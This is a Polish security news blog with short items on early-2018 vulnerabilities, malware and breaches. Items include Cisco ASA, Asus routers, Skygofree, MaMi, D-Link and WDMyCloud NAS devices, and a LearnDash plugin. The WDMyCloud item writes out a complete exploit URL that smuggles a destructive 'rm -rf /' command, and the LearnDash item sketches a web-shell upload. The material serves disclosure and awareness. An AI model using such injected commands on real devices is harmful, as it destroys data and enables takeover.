Badacze Pradeo Lab wykryli wyciek danych z gry Sonic firmy SEGA. Problem dotyczy aplikacji : Sonic Dash , Sonic the Hedgehog ™ Classic, Sonic Dash 2: Sonic Boom. Powyższe aplikację zbierają dane o glokalizacji  i urządzeniach użytkowników. Dane głównie są wysłane w celach marketingowych. Niepokoi jednak fakt, że powyższe aplikacje mają sporo luk bezpieczeństwa między innymi takie które pozwalają na wykonanie ataku Man-In-the-Middle.

Jednocześnie Pradeo Lab zwraca uwagę aby użytkownicy dokładniej czytali do jakich zasobów aplikacja chce mieć dostęp. Na przykład – jeżeli aplikacją jest grą i prosi o dostęp do kontaktów lub smsów to powinno wydać się to podejrzane.

Źródło: http://blog.pradeo.com/sega-apps-data-leakage

Cyber blog

Encrypted Traffic Analytics – znajdź malware w szyfrowanym ruchu

Firma Cisco przedstawiła produkt Encrypted Traffic Analytics (ETA), który umożliwia identyfikowanie malweare-u w ruchu zaszyfrowanym przy pomocy protokołów SSL/TLS bez potrzeby jego odszyfrowania. W tym celu używano jak dotąd głównie serwerów, lub urządzeń pracujących w trybie proxy, które zastępowały oryginalne certyfikaty własnymi. Jednak ta metoda mogła wprowadzać pewne opóźnienia w ruchu oraz ingerowała w prywatność użytkowników.

Jak działa Encrypted Traffic Analytics

Rozwiązanie wykrywa złośliwe oprogramowanie używając uczenia maszynowego oraz modelowania statystycznego. Do tego celu zbierane są np.:

  • statystyki generowane przez protokół Netflow,
  • długość analizowanych pakietów,
  • informacje zawarte w wiadomościach TLS ClientHello.

Aktualnie ETA wymaga aplikacji Cisco Stealthwatch w celu przetwarzania danych oraz współpracuje jedynie ze switchami Catalyst z serii 9000 i routerami ISR serii 4000.

Źródło: https://blogs.cisco.com/security/detecting-encrypted-malware-traffic-without-decryption,

Cyber blog

Luka w oprogramowaniu Lenovo do zarządzania czytnikiem linii papilarnych

Lenovo wydało poprawki do laptopów gdzie została zidentyfikowana luka ThinkPad, ThinkCentre i ThinkStation.

Usuwana jest tym samym luka w Managerze danych logowania odcisków palców. Problem dotyczy systemu Windows 7, 8 i 8.1 oraz Managera linii papilarnych w wersji 8.01.86. Rozwiazaniem będzie aktualizacja programu Fingerprint Manager Pro do wersji 8.01.87 lub nowszej. Problem nie dotyczy tylko Windowsa 10. W Windows 10 zarządzanie logowaniem za pomocą linii papilarnych odbywa się przez system.

Podatne modele laptopów:

  • ThinkPad L560, P40 Yoga, P50s, T440, T440p, T440s, T450, T450s, T460, T540p, T550, T560, W540, W541, W550s oraz ThinkPad X1 Carbon (Type 20A7, 20A8), X1 Carbon (Type 20BS, 20BT), X240, X240s, X250, X260, Yoga 14 (20FY), Yoga 460
  • ThinkCentre M73, M73z, M78, M79, M83, M93, M93p, M93z
  • ThinkStation E32, P300, P500, P700, P900

https://support.lenovo.com/pl/en/product_security/len-15999

Źródło: https://threatpost.com/lenovo-fixes-hardcoded-password-flaw-impacting-thinkpad-fingerprint-scanners/129680/

Cyber blog

Cisco ASA SSL VPN – zdalne wykonanie kodu bez autoryzacji

Aktualizację zabezpieczeń Cisco dla wszystkich wersji oprogramowania Cisco ASA (od 8.x do 9.x). Usuwa ona niedawno wykryty błąd opisany w CVE-2018-0101, który dotyczył podatności w funkcjonalności SSL VPN. Pozwalał on nieautoryzowanemu użytkownikowi poprzez wysłanie kodu XML na interfejs z uruchomioną usługa webvpn zdalne wykonanie dowolnego kodu, lub restart urządzenia.

Podatność dotyczy oprogramowania Cisco ASA pracującego na poniższych urządzeniach:

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco
    7600 Series Routers
  • ASA 1000V Cloud Firewall
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4110 Security Appliance
  • Firepower 9300 ASA Security Module
  • Firepower Threat Defense Software (FTD)

Źródło: Cisco Security Center

Cyber blog

Uwaga na prezenty/nagrody w postaci pendrive

Złośliwy pendrive

Pod koniec zeszłego roku Tajwańskie biuro śledcze zorganizowało konkurs z zakresu cyberbezpieczeństwa. Nagrodą były m.in.: pendrive, który jako dodatkowy niechciany bonus miały złośliwe oprogramowanie. Do zainfekowania pendrive doszło prawdopodobnie podczas ich testowania w firmie dostarczającej nagrody. Zmodyfikowane pendrivy kradły poufne dane użytkowników, które były przesyłane na serwery w Polsce. Następnie dalej przekazywane do kolejnych niezidentyfikowanych maszyn cyberprzestępców.

Sprawa była by dość śmieszna a w ręcz żenująca gdyby nie fakt, że tego typu zdarzenie pojawiło się nie pierwszy raz. W 2008 Australijska firma Telekomunikacyjna przekazała zainfekowane pendrivy uczestnikom na konferencji bezpieczeństwa. Podobna wpadkę miał IBM w roku 2002 wysyłając do klientów raz systemami pamięci masowej pendrive zawierający złośliwe oprogramowanie.

Badania

Naukowcy z Googla oraz uniwersytetów w Illinois i Michigan w roku 2016 przeprowadzili badanie polegającym na “rozsypaniu” na terenie kampusu około 300 pendrivów. Wynik był alarmujący około 48% dysków zostało doniesionych i podłączonych do komputerów. Powyższe badanie oraz opisane wydarzenia pokazują jak skuteczną metodą na dostarczanie złośliwego oprogramowania jest umieszczanie go na pendrivach. Ciekawości ludzka zrobi resztę.

Źródło: https://www.welivesecurity.com/2018/01/12/taiwan-rewards-winners-malware-usb-sticks/

Cyber blog

Najbardziej zaawansowany malware na Androida

Badacze z KasperkyLab odkryli bardzo zaawansowany malware o roboczej nazwie Skygofree. Po dogłębnej analizie kodu okazało się, że malware wcale nie jest nowy. Jego pierwsze funkcjonalności sięgają roku 2014. Według badaczy złośliwa aplikacja początkowo potrafiła jedynie przeszukać smartphone-a w celu znalezienia bazy danych Whatsapp-a. Z czasem jednak była systematycznie „dozbrojona” a w 2016 roku została wzbogacona o moduł służący do ściągnięcie różnych exploitów. To za ich pomocą których atakujący starał się podnieść uprawnienia do root-a. Exploity wykorzystywały podatności CVE-2013-2094, CVE-2013-2595, CVE-2013-6282, CVE-2014-3153 (futex aka TowelRoot), CVE-2015-3636. Jeżeli android posiadał którąkolwiek z wyżej opisanych luk to złośliwa aplikacja przejmowała  uprawnienia administratora na zarażonym smartphonie.

Trzeba przyznać, że malware jest wyjątkowo profesjonalnie napisany, a metodę jej działania można porównać do szwajcarskiego scyzoryka. Wystarczy wysłać odpowiednią komendę, aby przeprowadzić całą gamę działań wywiadowczych na zarażonym smartfonie. Oto przykłady kilku z nich:

  • „geofance” – jeżeli użytkownik znalazł się we wskazanej przez atakującego lokalizacji malware uruchamiał wbudowany w smartphona mikrofon.
  • „social” – komenda służąca do przechwytywania baz danych następujących aplikacji: messangera, facebooka, whatsappa czy gmaila
  • „wifi” – podłączenie się do wifi o wskazanych parametrach (jeżeli urządzenie jest w zasięgu). Prawdopodobnie funkcjonalność służyła jako element starannie przeprowadzonych podsłuchów Man in the middle (MitM).
  • „camera” – rozpoczęcie nagrywania lub zrobienie zdjęcia przednim aparatem telefonu, zaraz po tym gdy telefon zostanie odblokowany przez użytkownika.

…i wiele innych „usług”, które pozwalały na między innymi przechwytywanie wiadomości SMS, czytanie informacji w kalendarzu itp. Występujące w kodzie komentarze w języku włoskim oraz wysoka jakość kodu mogą przywodzić na myśl skojarzenia ze słynną grupą Hacking Team, piszącą oprogramowanie szpiegowskie na potrzeby różnych rządów. Nie jest do końca znana forma rozprzestrzeniania się malware, ale najprawdopodobniej były do tego wykorzystywane fałszywe strony zaufanych operatorów (np.: Vodafone), na których odwiedzających namawiano do zainstalowania aplikacji przyśpieszającej połączenie z operatorem.

Cyber blog

Duży wyciek danych brytyjskich firm do Dark Webu

Kilkadziesiąt godzin temu, w poniedziałek 22 stycznia, odkryto wielki przeciek danych brytyjskich firm do Dark Webu. Badacze z firmy RepKnight, szacują, że wyciekły dane ponad 500 legalnych firm, tj. ponad 1 000 000 maili. Około 80% z nich wyciekło razem z hasłami.

Większość wykradzionych haseł była  trzymana w zwykłych plikach tekstowych. Wyciek jest świeży, ale ponad połowa wykradzionych danych ma już ponad pół roku.

Źródło: zdnet.com

Cyber blog

Niszcz, aby chronić – poliwęglan autodestrukcji

Do czego służy poliwęglan ?

Ochrona informacji zwykle kojarzy się nam z bronieniem dostępu do niej, szyfrowaniem czy robieniem kopii zapasowych. Bywają jednak sytuacje, w których aby ustrzec sekret przed wpadnięciem w niepowołane ręce, musimy go zniszczyć. Może nam w tym pomóc poliwęglan.

Jak wiadomo, najpewniejszym sposobem na pozbycie się danych cyfrowych jest fizyczna destrukcja nośnika, na którym się one znajdują. Można w tym celu wykorzystać młotek, wiertarkę lub specjalistyczny shredder. Są to niestety rozwiązania, które trudno zastosować niepostrzeżenie. Co gorsza, wymagają one bezpośredniego kontaktu z nośnikiem.

Nowy poliwęglan autodestrukcji

Możliwe, że niedogodności te rozwiąże materiał opracowany przez badaczy z Uniwersytetu Cornella oraz firmy Honeywell Aerospace. Zaprojektowali oni poliwęglan, który zawiera wiele mikroskopijnych przestrzeni, wypełnionych na przemian rubidem i difluorkiem sodu. Dodatkowo, obszary te połączone są grafenowymi „zaworami”, które mogą zostać „otwarte” np. w wyniku wystawienia na działanie fal radiowych o odpowiedniej częstotliwości. Połączenie tych dwóch związków chemicznych rozpoczyna reakcję, która prowadzi do całkowitego rozpadu tworzywa.

Wynika stąd, że chroniony układ elektroniczny warto zamknąć w obudowie z takiego materiału. Gdy pojawi się potrzeba pewnego i dyskretnego unicestwienia danych, wystarczy tylko wysłać sygnał.

Źródło: https://news.cornell.edu/stories/2018/01/engineers-create-new-architecture-vaporizable-electronics

Cyber blog

Kolejna kampania malware Zyklon

Na blogu FireEye opublikowano informację, że znany od 2016 roku malware Zyklon rozprzestrzenia się ponownie. WYkorzystuje co najmniej trzy podatności MS Office: CVE-2017-8759, CVE-2017-11882 oraz DDE. Wektorem infekcji jest mail – najczęściej spamowy – opatrzony spakowanym załącznikiem (ZIP). Zawiera on złośliwy plik DOC. Według pozyskanych informacji atak konsekwentnie kierowany jest głównie w firmy z sektora telekomunikacyjnego, ubezpieczeniowego i finansowego.​

Źródło: https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html

Cyber blog

Odkryto wiele podatności w routerach Asus

Badacz z Polski odkrył serię podatności w serwerze http będącym częścią firmware routerów Asus serii RT-N65x (podatności dotyczą firmware do wersji 3.0.0.4.376.x).

Wykryte podatności w routerach Asus

  1. Brak walidacji nagłówków http prowadzący do zdalnego wykonania kodu – nieuwierzytelniony użytkownik poprzez zmianę wartości niektórych nagłówków (np. Header) może nadpisać wywołanie SystemCmd które prowadzi do wykonanie polecenia w kontekście powłoki urządzenia.
  2. Przewidywalne tokeny sesji – sesje użytkowników generowane są na routerze z pomocą funkcji systemowej rand., jednak funkcja ta jako stan początkowy przyjmuje czas unixowy – przez co w łatwy sposób można przewidzieć jej kolejne wartości. Jednak żeby wykorzystać tą podatność należy obejść sprawdzenie IP, co także się udało.
  3. Niedostateczna walidacja IP zalogowanego użytkownika – atakujący znający metodę generowanie tokenów sesji może ominąć walidację adresu IP przez ustawienie specjalnej wartości w nagłówka User-Agent
  4. Hasła na routerze przechowywane są czystym tekstem. Atakujący przez odczytanie pamięci nvram (lub analizę kopii zapasowej) jest w stanie odczytać hasło administracyjne routera.
  5. Niezalogowany atakujący może pozyskać informacje na temat sesji zalogowanych użytkowników
Producent został poinformowany o wyżej wymienionych podatnościach. Jednak zaznaczył, że nie poprawi ich, gdyż opisywana wersja firmware uzyskała status end-of-life. Tym samym zaleca aktualizację do najnowszej wersji. Jeśli niemożliwa jest aktualizacja do najnowszej wersji oprogramowania zalecane jest wyłączenie usługi http na porcie wan.​

Źródło: http://sploit.tech/2018/01/16/ASUS-part-I.html, http://sploit.tech/2018/01/16/ASUS-part-II.html

 

Cyber blog

Złośliwe aplikacje w Sklepie Google wyświetlające „nieodpowiednie treści”

Złośliwe aplikacje w Sklepie Google wyświetlających „nieodpowiednie treści”

Badacze z ChackPointa wykryli w sklepie Google Play około 60 złośliwych aplikacji, które oprócz wyświetlania reklam dostarczały także „niewłaściwe obrazki”.

Złośliwe oprogramowanie występowało w trzech wariantach:

  1. Wyświetlanie reklam, które bardzo często były „nieodpowiednimi treściami” problem polega na tym, że reklamy te pojawiały się w grach/programach których nazwa sugerowała, że mogą to być aplikacje przeznaczone dla dzieci/młodzieży.
  2. Zachęcanie użytkowników do pobierania aplikacji podszywających się pod aplikację podnoszące bezpieczeństwo.
  3. Rejestrowanie użytkowników do usługi premium.

Reakcja Google

Google poinformował o usunięciu złośliwych aplikacji ze sklepu. Dodatkowo Google zaleca aby Rodzice sprawdzali czy aplikacje używane przez dzieci są  zakwalifikowane jako „ Zaprojektowane dla rodzin”

Źródło: https://blog.checkpoint.com/2018/01/12/childrens-apps-google-play-display-porn-ads/

Cyber blog

Protokół bezpieczeństwa WPA3 prawdopodobnie w 2018

Protokół bezpieczeństwa WPA3 prawdopodobnie w 2018

​Na konferencji CES, Alliance Wi-Fi ogłosiło wprowadzenie 2018 nowego protokołu bezpieczeństwa Wi-Fi – WPA3.

Szczegóły nie są do końca znane. Wiadomo, że będzie on zawierał cztery nowe funkcje podnoszące bezpieczeństwo Wi-Fi:

  1. Ochrona przed atakiem słownikowym na hasło dostępowe do sieci Wi-Fi. Pomimo ustawienia łatwego hasła uwierzytelniającego dostęp będzie odpowiednio chroniony.
  2. Łatwiejsze zabezpieczenie Internetu rzeczy nie posiadających graficznego interfejsu. Na ten moment nie są znane szczegóły techniczne jak to będzie realizowane w praktyce.
  3. Silniejsze szyfrowanie – WPA2 wymaga 64 lub 128-bitowego klucza szyfrowania. WPA3 ma używać 192-bitowego szyfrowania.
  4. Zabezpieczenie dostępu do sieci Wi-Fi w miejscach publicznych. Nowy standard obiecuje podniesienie bezpieczeństwa dzięki „ zindywidualizowanemu szyfrowaniu danych” – w chwili obecnej nie ma dokładnych informacji technicznych jak będzie to realizowane.

Zanim poczujemy zalety z wdrożenia nowego standardu najpierw Wi-Fi Alliance musi certyfikować sprzęt wykorzystujący nowy protokół. Istnieją duże szanse, że już wy tym roku pojawią się urządzenia korzystające z WPA3. Więcej szczegółów można znaleźć na Wi-Fi Allance.

Źródło: https://blog.malwarebytes.com/security-world/2018/01/wpa3-will-secure-wi-fi-connections-in-four-significant-ways-in-2018/

Cyber blog

Kopanie kryptowalut w publicznych sieciach Wi-Fi

Aplikacja CofeeMiner umożliwia wyszukiwanie i kopanie krypotwalut.

Wykorzystywane są zasoby sprzętowe urządzeń podłączonych do wspólnej sieci Wi-Fi a następnie umożliwia kopanie kryptowalut. Aby było to możliwe ruch sieciowy musi być wcześniej przekierowany na określony punkt dostępowy. Zarządzany jest przez atakującego np. przy użyciu techniki typu ARPspoofing. Następnie do treści stron, które wykorzystują protokół HTTP jest dodawany skrypt zmuszający urządzenie ofiary do kopania kryptowalut.

Program ten nie ingeruje w strony zabezpieczone protokołem HTTPS, lub przez połączenia VPN.

Źródło: https://nakedsecurity.sophos.com/2018/01/09/coffeeminer-project-lets-you-hack-public-wi-fi-to-mine-cryptocoins/

Cyber blog

RansomCloud – nowe zagrożenie szyfrujące wiadomości użytkownika

Specjaliści z ElevenPaths – firmy zajmującej się cyberbezpieczeństwem przedstawili nowy rodzaj ransomware-u. Jest to złośliwe oprogramowanie o nazwie O365 RansomCloud szyfrujące wiadomości użytkownika przechowywane w chmurze. W ramach PoC wykorzystano usługę Microsoft Office 365 oraz Windows Live. Zastrzeżono jednak, że ten rodzaj ataku działa także na usługi innych tzw. IdPs (ang. Identity Providers) takich jak Twitter, Facebook czy też Google.

Jak działa atak

Atak sprowadza się do wysłania wiadomości phishing-owej do użytkownika. W niej jest zawarta informacja o potrzebie kliknięcia linku ze względu, np. na nową usługę antyspamową. Wówczas użytkownikowi zostaje wyświetlona informacja, iż nowa aplikacja (napisana przez atakującego) wymaga dostępu do określonych zasobów, np. kalendarza, kontaktów czy też wiadomości. Jeżeli bez większej refleksji zatwierdzimy uprawnienia dla nowej aplikacji, wówczas poprzez mechanizm OAuth udostępniamy swoje zasoby atakującemu.
Poniżej dodatkowo zamieszczono 2 wideo (1-sze z komentarzem Kevina Mitnicka):
  1. Ransomcloud Demo
  2. Sappo – [4] RansomCloud O365

Źródło: RansomCloud O365 report – https://www.elevenpaths.com/new-ransomcloud-o365-report/index.html

Cyber blog

Pierwszy nowy malware na systemy macOS w 2018 roku

W piątek 12 stycznia 2018 roku Patrick Wardle opublikował raport o nieznanym złośliwym oprogramowaniu na macOs o nazwie roboczej MaMi. Nie jest znany sposób rozprzestrzeniania się złośliwego oprogramowania, ale znana jest jego działanie. Działalność malware jest subtelne, bezobjawowa i …  niezwykle groźne. Sprowadza się do podmienienia serwerów DNS na zarażonej stacji, tak by domyślnymi serwerami DNS były 82.163.143․135 i 82.163.142․137. Dodaje również do przeglądarki nowego zaufanego urzędu certykującego claudguard.me.

Jakie możliwości dawało to atakującym

Wyobraźmy sobie, że z zarażonego komputera logujemy się do swojego ulubionego banku. Wpisujemy poprawny adres www banku, przezornie sprawdzamy czy strona autoryzowana jest akceptowanym certyfikatem (zielona kłódka) i dopiero wtedy wpisujemy swój login i hasło… który momentalnie trafia do przestępców.

Jak działa taki atak „Main in The Middle”

Użytkownik Mac-a wpisuje adres www banku, a następnie komputer łączy się z podmienionym przez złośliwe oprogramowanie serwerem DNS, który przekierowuje na fałszywą stronę banku. Przeglądarka nawiązuje połączenie szyfrowane z podmienioną stroną, ale ponieważ jest ona podpisana certyfikatem dodanym do zaufanej listy widzimy zieloną kłódkę i przeglądarka w żaden sposób nie ostrzega o możliwości podmiany strony.

Czy właśnie ofiarą MaMi padli klienci BlackWallet.co, tracąc w sumie 1400 000 zł (pisaliśmy o tym w materiale Inwestorzy okradzeni na łączną kwotę 1 400 000 zł)? Niestety nie możemy ani potwierdzić, ani zaprzeczyć takim domysłom, ponieważ wykrycie malware MaMi nastąpiło tak niedawno, że nie znamy skali i zakresu wykorzystania go przez przestępców. Na koniec zostawiliśmy najważniejsze czyli jak sprawdzić czy jesteśmy zarażeni i co zrobić w przypadku potencjalnej infekcji. W celu wykrycia MaMi  wystarczy sprawdzić czy w naszej przeglądarce na liście zaufanych urzędów certyfikacyjnych występuje claudguard.me lub czy w naszej lokalnej liście DNS znajdują się dowolne serwery o adresie 82.163.*. W przypadku infekcji odkrywca złośliwego oprogramowania sugeruje pełne przeinstalowanie macOS-a.

 

Źródło: https://www.intego.com/mac-security-blog/ay-mami-new-dns-hijacking-mac-malware-discovered/

Cyber blog

Zdalne wykonanie kodu w D-Link DNS-343 ShareCenter

Zdalne wykonanie kodu w D-Link DNS-343 ShareCenter

D-Link DNS-343 jest urządzeniem klasy NAS (koszt ~520$), w którym ujawniono podatność pozwalającą na zdalne wykonanie kodu. DNS-343 ma możliwość udostępniania zasobów przez serwer www (goAhead Web Server) na którym odkryto w katalogu “maintenance” skrypt test_mail.asp. Analiza opisywanego skryptu wykazała, że dane przekazywane do niego w żaden sposób nie są walidowane, oraz wykonuje on bezpośrednio polecenie systemowe. Pozwoliło to atakującemu na wstrzyknięcie kodu do polecenia, które zostało z powodzeniem wykonane w systemie. Producent został poinformowany o podatności. Jednak ze względu na brak odzewu przez ostatnie 6 miesięcy błąd został opublikowany wczoraj.

Źródło: https://cxsecurity.com/issue/WLB-2018010141

Cyber blog

Łatki bezpieczeństwa MS_2018_01_09

Najnowsze łatki bezpieczeństwa (23 szt.) opublikowanie we wtorek 09.01.2018 mają zawarte poprawki dla Adobe Flash, MS Office, .Net. Łatki nie zawierają jednak poprawek dla podatności Meltdown i Spectre.

Łatki bezpieczeństwa – zawartość poprawek

Poprawki krytyczne będą usuwać luki w Adobe Flash , oraz lukę związaną z pamięcią w MS Word.

Poprawki ważna usuwają luki w .NET , oraz możliwość zdalnego wykonania kodu w MS Office.

Poprawki umiarkowane są w stanie usunąć luki w ASP.NET.

Poprawki niskie usuwają luki w MS Word.

Źródło: trustwave.com

Cyber blog

Łatwa droga do przejęcia bezpiecznego systemu poprzez Intel AMT

Łatwa droga do przejęcia bezpiecznego systemu poprzez Intel AMT

Ostatnio firma Intel nie ma dobrej passy. Po Meltdown i Spectre, specjaliści z F-Secure wykryli (nawet w lipcu 2017 a teraz tylko ogłosili) kolejny problem bezpieczeństwa. W firmware Active Management Technology (AMT), która jest zainstalowana w ponad 100 milionach komputerów z procesorami Intela, głównie w korporacyjnych laptopach.

Jak działa mechanizm

Okazuje się, że wystarczy mieć dostęp fizyczny do komputera z niezmienioną po instalacji konfiguracją AMT . Można wtedy ustawić AMT w tryb umożliwiający na zdalny dostęp do tego komputera. Zmiana tej konfiguracji jest możliwa nawet w kilka minut. Bez względu na to czy BIOS jest chroniony hasłem, używany jest TPM lub używany Bitlocker. Wystarczy podczas startowania komputera wcisnąć klawisze Ctrl-P na wyświetlanym ekranie BIOSu. W ten sposób można uzyskać dostęp do rozszerzenia AMT BIOS o nazwie Management Engine BIOS Extension (MEBx). Z kolei za jego pośrednictwem do AMT chronionym(?!) domyślnym hasłem ‘admin’.

AMT umożliwia nawet na wyłączonym komputerze zdalny dostęp do dysku lub RAM lub zabootować zewnętrzny system operacyjny. Potencjalne konsekwencje przejęcia AMT na komputerze są poważne. Funkcje AMT opisane są pod linkiem https://www.symantec.com/connect/articles/why-must-intel-amt-be-configured-and-what-required .

Morał z tej historii taki jak zawsze: zmieniaj domyślne hasła i nie powalaja na nieautoryzowany dostęp fizyczny do swoejgo komputera, nawet gdy jest on wyłączony.

Źródło: http://securityaffairs.co/wordpress/67671/hacking/intel-active-management-technology-issue.html

Cyber blog

Kolejny botnet kopiący Monero na podatnych serwerach JBoss

​Monero – bot skanujący serwery JBOSS

W połowie grudnia 2017 zaobserwowano kampanię skanowania serwerów JBOSS przez botnet Monero pod względem istnienia podatności CVE-2017-12149. Dotyczą nieprawidłowej deserializacji danych przez Jbossa. Boty wysyłały żądanie http na url “/invoker/readonly” na 6 portów tcp używanych przez Jbossa. Rejestrowały je w serwerze C&C IP wszystkich komputerów, które w odpowiedzi zwracały kod błędu 500 z napisem “Jboss”/”jboss”. Przejmowane w ten sposób komputery wykorzystywane były do kopania kryptowaluty Monero co jest obecnie dosyć powszechne oraz do skanowania kolejnych komputerów.

Zapasowy serwer sterujący

W samym malware nietypowa była jeszcze jedna rzecz. System bota, oprócz adresu serwera C&C, zawierał również link do publicznego pliku pastebin.com, w którego treści znajdował się adres zapasowego serwera C&C. W przypadku niedostępności lub zablokowaniu adresu podstawowego, atakujący miał wtedy możliwość łatwego przekierowania botneta na dowolny inny serwer nim zarządzający.

Zyski botneta na kopaniu Monero to 60 tys. USD w ciągu 2 tygodni.

Źródło: https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar?sf178360556=1

Cyber blog

Przesyłanie szyfrowanych danych nie zapewnia poufności

Przesyłanie szyfrowanych danych nie zapewnia poufności – na przykładzie drona.

Drony są wykorzystywane zarówno do celów typowo rozrywkowych jak i biznesowych. Czasami jednak mogą stanowić zagrożenie życia fizycznego lub ingerować w nasze życie wbrew naszej woli. Dlatego bardzo przydatne mogą być ostatnie eksperymenty specjalistów. Stwierdzili oni, że istnieje możliwość identyfikacji czy dron, który na bieżąco przekazuje obraz ze swojej kamery do stacji odbierającej rejestrował również obraz danego obiektu. Transmisja taka przenosi w pewnym uproszczeniu tak naprawdę tylko zmiany między kolejnymi ramkami/obrazami streamingu. Przechwytywanie nawet szyfrowanego sygnału z drona i badanie jego charakterystyki w czasie wystarcza, żeby dokonać identyfikacji rejestrowanego obiektu.

Test na filmach z serwisu Netflix

Podobne doświadczenie zrobiono tworząc bazę próbek 300 tys. filmów w serwisie Netflix , które później umożliwiły z 90% dokładnością zidentyfikować jaki film był oglądany na telewizorze już po 8 minutach przechwytywania szyfrowanego sygnału (https://spectrum.ieee.org/tech-talk/telecom/security/we-know-what-youre-watching-even-if-its-encrypted)

Źródło: https://www.wired.com/story/a-clever-radio-trick-can-tell-if-a-drone-is-watching-you/

Cyber blog

Backdoor w przełącznikach sieciowych firmy Lenovo

Podczas audytu inżynierowie Lenovo wykryli Backdoor w systemach ENOS (Enterprise Network Operating System) przełączników Lenovo, IBM RackSwitch i BlaCenter.

Wykryta podatność to znany dobrze „Backdoor HP” (ominięcie uwierzytelniania), dotyczy zarządzania poprzez Telnet, Console (port typu Serial) i SSH. Firma twierdzi że „Backdoor” został dodany w 2004 kiedy ENOS należą firmy Nortel, na prośbę OEM BSSBU.

Zalecane rozwiązanie problemu przez producenta:
– Aktualizacja systemu – Lenovo wydało już aktualizacje nawet dla starszych przełączników typu IBM,
– Włączenie LDAP, RADIUS, TACAS+,
– Wyłączenie Telnet,
– Ograniczenie fizycznego dostępu do Konsoli.

Źródło: https://support.lenovo.com/pl/pl/product_security/len-16095

Cyber blog

Grupowe rozmowy na Signal i WhatsApp możliwe do podsłuchania!

Naukowcy z politechniki Ruhr-Universität Bochum (RUB) opublikowali badania pokazujące możliwość podsłuchiwaniu grupowych rozmów w aplikacjach Threema, Signal i WhatsApp. Odkrycie jest wyjątkowe, ponieważ do tej pory komunikacja „end-to-end” była uznawana za w pełni bezpieczną. Co więcej – aplikacja Signal stała się wręcz niedoścignionym wzorem komunikatora zapewniającego prywatność.

Z pracy naukowców wynika, że administrator serwera Signal/WhatsApp, który udostępnia grupową rozmowę, jest w stanie skrycie dodać niewidocznego członka do grupy, który będzie miał pełny dostęp do komunikacji. W przypadku Signal-a sytuacja jest lepsza niż w przypadku WhatsApp. Do wprowadzenia „swojego człowieka” do grupy atakujący musi znać niejawny numer „Group ID”. Zdobycie „Group ID” chociaż trudne, otwiera potencjalny wektor ataku. Optymistycznym akcentem jest fakt, że naukowcy nie wspominają nic o możliwości przechwycenia zwykłej komunikacji „jeden do jednego”. Oznacza to, że pomimo wieloletnich prób i otwartego kodu aplikacji, Signal do dzisiaj nikt nie znalazł podatności w jej podstawowe funkcjonalności.

Źródło: https://eprint.iacr.org/2017/713.pdf

Cyber blog

Podatność w „The Most Trusted WordPress LMS”

Hasłem reklamowym pluginu „Learn dash” jest „The Most Trusted WordPress LMS”. Dzisiaj możemy złośliwie dopowiedzieć do niego „…not anymore”. Właśnie odkryta podatność we wspomnianej wtyczce pozwala nieuprawnionych użytkownikiem przesyłanie plików na serwer.  Wystarczy spreparować zapytanie POST  aby przesłać „assig.php.” do folderu „/wp-content-uploads/assignments/” a następnie użyć go, aby przesłać skrypt shell-owy do folderu administratora strony i za pomocą tego ostatniego pliku i przejąć kontrole nad stroną w WordPressie.

Źródło: https://blog.nintechnet.com/arbitrary-file-upload-vulnerability-in-wordpress-learndash-lms-plugin/

Chcesz sprawdzić, czy Twoje zasoby są bezpieczne? Sprawdź naszą usługę doradztwa w zakresie bezpieczeństwa IT.

Cyber blog

Podatności w urządzeniach NAS serii WDMyCloud firmy Western Digital

Zespół badawczy z firmy Gultech wykrył kilka podatności w popularnych urządzeniach NAS serii WDMyCloud firmy Western Digital. Okazuje się, że wystarczy, że użytkownik podpięty do NAS i Internetu kliknie w link http://wdmycloud/cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlin
kBRionyg&passwd=YWJjMTIzNDVjYmE&start=1&count=1;rm+-rf+/; , np. zawarty w obrazku na przeglądanej stronie internetowej a wtedy atakujący uzyska dostęp do urządzenia z prawami administratora. Inna podatność wynika z błędnego parsowania nagłówka HHTP HOST przez funkcję php o nazwie gethostbyaddr() co można wykorzystać do umieszczenia dowolnego pliku (np. web shella) na NAS a zatem i wykonania dowolnego kodu z prawami administratora.

Taki sam kod oraz hasło a więc również w/w podatność miały urządzenia D-Link DNS-320L ShareCenter z firmaware o wersjach 1.0.6 lub wcześniejszych. W przypadku urządzeń Western Digital podatność istnieje do firmware w wersji 2.30.165 lub wcześniejszych.

Źródło: http://gulftech.org/advisories/WDMyCloud%20Multiple%20Vulnerabilities/125

Cyber blog

Windows Hello zostało oszukane przez zdjęcie

Jak twierdzi Microsoft “They can guess your password – not your face”. Niestety wygodny dla użytkownika mechanizm rozpoznawania twarzy w celu odblokowania komputera – Windows Hello – jest zawodny. Badacze z niemieckiej firmy SySS udowodnili, że przy sprzyjającej konfiguracji programowo-sprzętowej wystarczy odpowiednio spreparowane zdjęcie użytkownika i komputer zostanie odblokowany.

Atak jest skuteczny dla wszystkich wersji systemu Windows 10, które nie mają uruchomionej ochrony przeciw spoofowaniu usługi Hello (co musi być uruchamiane ręcznie i wspierane przez używaną kamerę).

Demo PoC: https://www.youtube.com/watch?v=GVKKcoOZHwk

Źródło: https://nakedsecurity.sophos.com/2018/01/02/windows-hello-face-recognition-spoofed-with-photographs/

RODO czyli ile faktycznie kosztują dane osobowe

Ostatnie rozporządzenie Parlamentu Europejskiego i Rady Europy o ochronie danych osobowych wprowadza ważne dla wielu podmiotów zmiany. Jedną z nich jest o wiele surowszy system kar za zaniedbanie bezpieczeństwa klientów. Exatel rozpoczął cykl spotkań dla biznesu i sektora publicznego, na których specjaliści od bezpieczeństwa radzą, jak dobrze wykorzystać dwuletni okres przejściowy i jak przygotować się na nowelizację RODO.

Pierwsze spotkanie z cyklu miało miejsce w warszawskich Łazienkach Królewskich, w restauracji Belvedere. W jego trakcie eksperci Exatel objaśniali, na czym polegają zmiany w RODO, kogo dotyczą, jakie praktyczne konsekwencje mają dla każdego rodzaju organizacji.

O wadze problemu świadczą ostatnie wydarzenia na całym świecie. Nasi specjaliści od cyberbezpieczeństwa pokazywali przykłady modele ataków i związane z nimi wycieki danych. Radzili też, jak w świetle zaostrzonych norm ochrony danych zabezpieczyć się przed ich kradzieżą.

